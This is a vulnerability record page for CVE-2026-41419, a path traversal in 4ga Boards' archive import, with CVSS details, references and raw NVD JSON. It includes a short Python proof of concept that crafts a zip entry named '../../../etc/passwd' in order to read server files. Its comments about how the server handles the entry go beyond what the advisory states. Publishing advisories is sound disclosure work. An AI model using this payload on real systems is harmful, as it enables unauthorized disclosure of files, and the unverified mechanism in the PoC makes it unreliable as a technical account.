CVE-2026-41419

Description

4ga Boards is a boards system for realtime project management. Prior to 3.3.5, a path traversal vulnerability allows an authenticated user with board import privileges to make the server ingest arbitrary host files as board attachments during BOARDS archive import. Once imported, the file can be downloaded through the normal application interface, resulting in unauthorized local file disclosure. This vulnerability is fixed in 3.3.5.

CVSS Details

CVSS Score

7.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

4ga Boards < 3.3.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import zipfile
import os

# Create a malicious zip file to demonstrate the path traversal
# The file inside the zip will have a name pointing to a sensitive file on the server (e.g., /etc/passwd)
filename = "malicious_boards_export.zip"

with zipfile.ZipFile(filename, 'w') as zf:
    # Zinfo object for the file with path traversal
    # This attempts to read /etc/passwd on the server when imported
    zinfo = zipfile.ZipInfo("../../../etc/passwd")
    zinfo.compress_type = zipfile.ZIP_DEFLATED
    # Add dummy content, as the server reads the file from the disk, not this content
    zf.writestr(zinfo, "This content is ignored, server reads the target file.")

print(f"[+] PoC file generated: {filename}")
print("[+] Upload this file to the 4ga Boards import function to trigger the vulnerability.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41419
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41419
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41419/
[4] VulDB https://vuldb.com/cve/CVE-2026-41419
[5] https://github.com/RARgames/4gaBoards/security/advisories/GHSA-rrjq-7x8g-cmgm
[6] https://github.com/RARgames/4gaBoards/security/advisories/GHSA-rrjq-7x8g-cmgm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41419", "sourceIdentifier": "[email protected]", "published": "2026-04-24T19:17:13.603", "lastModified": "2026-04-27T19:10:45.587", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "4ga Boards is a boards system for realtime project management. Prior to 3.3.5, a path traversal vulnerability allows an authenticated user with board import privileges to make the server ingest arbitrary host files as board attachments during BOARDS archive import. Once imported, the file can be downloaded through the normal application interface, resulting in unauthorized local file disclosure. This vulnerability is fixed in 3.3.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/RARgames/4gaBoards/security/advisories/GHSA-rrjq-7x8g-cmgm", "source": "[email protected]"}, {"url": "https://github.com/RARgames/4gaBoards/security/advisories/GHSA-rrjq-7x8g-cmgm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}